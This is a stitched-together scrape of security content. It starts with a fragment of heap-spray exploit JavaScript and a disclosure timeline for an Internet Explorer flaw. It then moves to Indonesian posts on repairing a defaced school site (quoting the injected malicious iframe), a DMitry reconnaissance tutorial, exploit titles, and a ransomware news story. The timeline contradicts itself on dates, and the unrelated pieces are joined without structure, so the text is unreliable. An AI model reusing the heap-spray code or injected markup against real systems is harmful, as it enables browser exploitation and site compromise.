if (u­Actual­Spray­Block­Size != gu­Spray­Block­Size)
throw new Error("Assertion failed: spray block (" + u­Actual­Spray­Block­Size.to­String(16) + ") should be " + gu­Spray­Block­Size.to­String(16) + ".");
console.log("create­Spray­Block():");
console.log(" s­Spray­Page.length: " + s­Spray­Page.length.to­String(16));
console.log(" u­Spray­Pages­Per­Block: " + u­Spray­Pages­Per­Block.to­String(16));
console.log(" s­Spray­Block.length: " + s­Spray­Block.length.to­String(16));
return s­Spray­Block;
}
function get­Heap­Block­Index­For­Address(p­Address) {
return ((p­Address % gu­Spray­Page­Size) - gu­Heap­Header­Size) >> 1;
}
function get­Spray­Block­Count(d­Spray_­dw­Value_­p­Address, p­Start­Address) {
p­Start­Address = p­Start­Address || 0;
var p­Target­Address = 0x0;
for (var p­Address in d­Spray_­dw­Value_­p­Address) {
p­Target­Address = Math.max(p­Target­Address, p­Address);
}
u­Spray­Blocks­Count = Math.ceil((p­Target­Address - p­Start­Address) / gu­Spray­Block­Size);
console.log("get­Spray­Block­Count():");
console.log(" p­Target­Address: " + p­Target­Address.to­String(16));
console.log(" u­Spray­Blocks­Count: " + u­Spray­Blocks­Count.to­String(16));
return u­Spray­Blocks­Count;
}
function spray­Heap(d­Spray_­dw­Value_­p­Address, p­Start­Address) {
var u­Spray­Blocks­Count = get­Spray­Block­Count(d­Spray_­dw­Value_­p­Address, p­Start­Address);
// Spray the heap by making copies of the spray "block".
var as­Spray = new Array(u­Spray­Blocks­Count);
as­Spray[0] = create­Spray­Block(d­Spray_­dw­Value_­p­Address);
for (var u­Index = 1; u­Index < as­Spray.length; u­Index++) {
as­Spray[u­Index] = as­Spray[0].clone();
}
return as­Spray;
}
Time-line
13 October 2012: This vulnerability was found through fuzzing.
29 October 2012: This vulnerability was submitted to EIP.
18 November 2012: This vulnerability was submitted to ZDI.
27 November 2012: EIP declines to acquire this vulnerability because they believe it to be a copy of another vulnerability they already acquired.
7 December 2012: ZDI declines to acquire this vulnerability because they believe it not to be exploitable.
During the initial report detailed above, I did not have a working exploit to prove exploitability. I also expected the bug to be fixed soon, seeing how EIP believed they already reported it to Microsoft. However, about two years later, I decided to look at the issue again and found it had not yet been fixed. Apparently it was not the same issue that EIP reported to Microsoft. So, I decided to try to have another look and developed a Proof-of-Concept exploit.
April 2014: I start working on this case again, and eventually develop a working Proof-of-Concept exploit.
6 November 2014: ZDI was informed of the new analysis and reopens the case.
15 November 2014: This vulnerability was submitted to i­Defense.
16 November 2014: i­Defense responds to my report email in plain text, potentially exposing the full vulnerability details to world+dog.
17 November 2014: ZDI declines to acquire this vulnerability after being informed of the potential information leak.
11 December 2012: This vulnerability was acquired by i­Defense.
The accidentally potential disclosure of vulnerability details by i­Defense was of course a bit of a disappointment. They reported that they have since updated their email system to automatically encrypt emails, which should prevent this from happening again.
9 June 2015: Microsoft addresses this vulnerability in MS15-056.
6 December 2016: Details of this vulnerability are released.
-->

Cara Memberbaiki Website smkpui-majalengka.sch.id Yang Di Retas

Pada postingan ini MHTeam berniat untuk membantu memberikan solusi bagaimana cara memperbaiki website SMKPUI MAJALENGKA yang diretas

Mari periksa source dari halaman home http://smkpui-majalengka.sch.id/, berikut source html dari halaman tersebut:

 6

Pada JavaScript tersebut terlihat kode IFRAME HTML berikut

<iframe src='http://moonveda.com/Indeutsch_system/mailer_images/index.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>
IFRAME HTML berfungsi untuk menampilkan halaman web di dalam halaman web, sehingga setiap kali anda mengakses website SMKUI MAJALENGKA maka akan menampilkan juga tampilan dari link ini http://moonveda.com/Indeutsch_system/mailer_images/index.html.
Selama JavaScript ini tidak dihapus, maka tampilan website SMKPUI-MAJALENGKA.SCH.ID tetap akan menampilan tampilan seperti pada gambar berikut:
1

Information Gathering WIth ‘Dmitry’

Download DMitry – https://github.com/jaygreig86/dmitry/

subdomain

  • #Mendapatkan informasi banner dari sebuah port yang tidak diproteksi
    [email protected]:~# dmitry -pb 192.168.130.130

banner

  • #Mendapatkan informasi Whois IP address dari sebuah host
    [email protected]:~# dmitry -i manadohacker.org
Deepmagic Information Gathering Tool
"There be some deep magic going on"
HostIP:104.28.11.213
HostName:manadohacker.org
Gathered Inet-whois information for 104.28.11.213
---------------------------------
inetnum: 104.0.0.0 - 104.243.215.255
netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr: IPv4 address block not managed by the RIPE NCC
remarks: ------------------------------------------------------
remarks:
remarks: You can find the whois server to query, or the
remarks: IANA registry to query on this web page:
remarks: http://www.iana.org/assignments/ipv4-address-space
remarks:
remarks: You can access databases of other RIRs at:
remarks:
remarks: AFRINIC (Africa)
remarks: http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks: APNIC (Asia Pacific)
remarks: http://www.apnic.net/ whois.apnic.net
remarks:
remarks: ARIN (Northern America)
remarks: http://www.arin.net/ whois.arin.net
remarks:
remarks: LACNIC (Latin America and the Carribean)
remarks: http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks: IANA IPV4 Recovered Address Space
remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
remarks:
remarks: ------------------------------------------------------
country: EU # Country is really world wide
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
status: ALLOCATED UNSPECIFIED
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: RIPE-NCC-HM-MNT
mnt-routes: RIPE-NCC-RPSL-MNT
created: 2016-10-17T14:26:07Z
last-modified: 2016-10-17T14:26:07Z
source: RIPE
role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
nic-hdl: IANA1-RIPE
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: RIPE-NCC-MNT
created: 1970-01-01T00:00:00Z
last-modified: 2001-09-22T09:31:27Z
source: RIPE # Filtered
% This query was served by the RIPE Database Query Service version 1.88 (ANGUS)
All scans completed, exiting

WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion

Windows x64 – WinExec() Shellcode (93 bytes)

Malware Manfaatkan Facebook & LinkedIn untuk Sandera PC

Jika malware biasanya menyerang lewat celah yang ada di browser atau sistem operasi, malware ini punya cara lain untuk menyusup, yaitu melalui Facebook dan LinkedIn.

Menurut peneliti di Check Point, ada ransomware yang merupakan varian dari Locky, memanfaatkan celah di Facebook dan LinkedIn, yaitu cara kedua media sosial itu menangani gambar, demikian dikutip detikINET dari Engadget, Senin (28/11/2016).

Triknya adalah memaksa browser pengguna untuk mengunduh foto yang sudah disusupi kode-kode berbahaya, yang kemudian akan menyandera sistem PC si korban jika file tersebut kemudian dibuka. Jika itu terjadi, semua file si korban akan terenkripsi sampai ia membayar uang tebusan.

Malware Locky sendiri sebenarnya cenderung mudah diatasi, selama calon korban sadar keberadaan malware ini dan tak membuka file tersebut. Namun lain hal pada variannya tersebut, karena didistribusikan melalui media sosial.

Masalahnya, kebanyakan software keamanan cenderung memercayai jejaring media sosial besar — seperti Facebook — dan kebanyakan orang pun begitu, sehingga mereka tak khawatir ketika mengunduh sesuatu dari situs seperti Facebook.

Check Point mengaku sudah melaporkan celah ini ke Facebook dan LinkedIn pada September lalu. Namun menurut juru bicara Facebook, laporan Check Point ini salah, karena ini bukanlah kasus ransomware.

“Analisis ini tidak benar. Tak ada hubungan ke Locky atau pun ransomware lain, dan ini tak muncul di Messenger ataupun Facebook. Kami sudah menginvestigasi laporan ini dan menemukan kalau ada sejumlah ekstensi jahat di Chrome, yang sudah kami blokir seminggu yang lalu,” tulis juru bicara Facebook itu.

(detik/asj/asj)